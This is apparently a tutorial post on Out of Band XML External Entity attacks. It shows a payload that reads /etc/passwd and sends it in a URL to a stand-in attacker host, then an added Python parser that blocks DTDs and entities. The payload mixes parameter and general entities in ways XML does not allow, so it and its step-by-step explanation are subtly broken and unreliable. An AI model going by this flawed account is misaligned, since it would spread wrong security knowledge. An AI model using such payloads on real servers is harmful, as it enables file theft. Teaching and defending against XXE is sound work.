Out of Band XML External Entity (XXE)

What is Out of Band XXE?
When an attacker cannot read the result of an XXE injection in the same band or channel as the request (the HTTP response), they try to retrieve the desired information through some other channel. When the information is obtained through a different band or channel in this way, the attack is called Out of Band XXE.
How does an Out of Band XXE work?
As explained above, Out of Band XXE lets an attacker retrieve the desired information through a different channel: the attacker injects an XML external entity whose value is the URL of some external server.
To detect an Out of Band XXE, an attacker places an attacker-controlled URL in the external entity of the XML file and watches for the DNS and HTTP requests arriving at that URL, which confirms the vulnerability.
Examples:

Let's understand XXE with a basic example. Assume that a college application has a filter option and that the following XML file is used as input to an insecure parser:

<?xml version="1.0" encoding="UTF-8"?> 
<filter>
    <semester>3</semester>
    <branch>CE</branch>
</filter>

If the server parses this file insecurely on the server side, an attacker can supply the following payload to exploit the Out of Band XXE:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE filter [
<!ENTITY % secretFile SYSTEM "file:///etc/passwd">
<!ENTITY % semester "<!ENTITY &#x25; branch SYSTEM 'http://www.attackercontrolleddomain.com/?exploit=%secretFile;'>">
]>
<filter>
    <semester>&semester;</semester>
    <branch>&branch;</branch>
</filter>

When the XML parser resolves the semester entity, that entity defines a second entity, branch, whose value includes the contents of the passwd file. When the parser then resolves the branch entity, it makes an HTTP request to the attacker's server with the passwd file content in the exploit parameter.
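As an added example (not code from the original post), the following Python parser for the <filter> document shown above uses only the standard library's expat binding and refuses any DOCTYPE, entity declaration or external entity reference before anything is resolved, so a payload of the kind described never produces the outbound DNS or HTTP request the attacker is waiting for. The sample documents and the placeholder URL in it are constructed for this example.

```python
# Added example (not from the original post): a hardened parser for the
# <filter> document above, built on Python's standard-library expat binding.
# It refuses any DOCTYPE, entity declaration or external entity reference
# before the parser resolves anything, so an Out of Band XXE payload never
# produces an outbound DNS or HTTP request.
from xml.parsers import expat


class UnsafeXMLError(ValueError):
    """Raised when a document tries to use DTD or entity features."""


def parse_filter(document: bytes) -> dict:
    """Parse <filter><semester/><branch/></filter> into a dict, rejecting DTDs."""
    parser = expat.ParserCreate()
    # Never process parameter entities: this disables external DTD loading and
    # the parameter-entity chaining used by Out of Band payloads.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def reject_doctype(doctype_name, system_id, public_id, has_internal_subset):
        # Fires as soon as <!DOCTYPE ...> is seen, before any entity is declared.
        raise UnsafeXMLError(f"DOCTYPE not allowed (name={doctype_name!r})")

    def reject_entity(entity_name, is_parameter_entity, value, base,
                      system_id, public_id, notation_name):
        # Defence in depth: catches entity declarations if DOCTYPE were ever allowed.
        raise UnsafeXMLError(f"entity declaration not allowed: {entity_name!r}")

    def reject_external_ref(context, base, system_id, public_id):
        # Defence in depth: expat calls this before fetching an external entity.
        raise UnsafeXMLError(f"external entity reference blocked: {system_id!r}")

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.EntityDeclHandler = reject_entity
    parser.ExternalEntityRefHandler = reject_external_ref

    result = {}
    open_elements = []   # element names from the root down to the current one
    text_chunks = []     # character data of the element currently being read

    def start_element(name, attrs):
        open_elements.append(name)
        text_chunks.clear()

    def character_data(data):
        text_chunks.append(data)

    def end_element(name):
        open_elements.pop()
        if open_elements == ["filter"]:       # direct child of <filter>
            result[name] = "".join(text_chunks).strip()

    parser.StartElementHandler = start_element
    parser.CharacterDataHandler = character_data
    parser.EndElementHandler = end_element

    parser.Parse(document, True)
    return result


def classify(document: bytes) -> str:
    """'ok' for a clean document, 'blocked' for DTD/entity use, 'malformed' otherwise."""
    try:
        parse_filter(document)
        return "ok"
    except UnsafeXMLError:
        return "blocked"
    except expat.ExpatError:
        return "malformed"


# Constructed sample inputs for demonstration.
BENIGN_FILTER = b"""<?xml version="1.0" encoding="UTF-8"?>
<filter>
    <semester>3</semester>
    <branch>CE</branch>
</filter>"""

# Same shape as the payload discussed above; the host name is a placeholder.
HOSTILE_FILTER = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE filter [
<!ENTITY % secretFile SYSTEM "file:///etc/passwd">
<!ENTITY % semester "<!ENTITY &#x25; branch SYSTEM 'http://placeholder.invalid/?exploit=%secretFile;'>">
]>
<filter>
    <semester>&semester;</semester>
    <branch>&branch;</branch>
</filter>"""

if __name__ == "__main__":
    print(parse_filter(BENIGN_FILTER))      # {'semester': '3', 'branch': 'CE'}
    print(classify(HOSTILE_FILTER))         # blocked
```

The document is rejected at the DOCTYPE declaration itself, before the parser has read a single entity, so the two later handlers only matter if an application deliberately re-enables DTDs. Returning a category string from classify keeps the decision easy to log, which is where a defender would look for repeated "blocked" results from one client.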
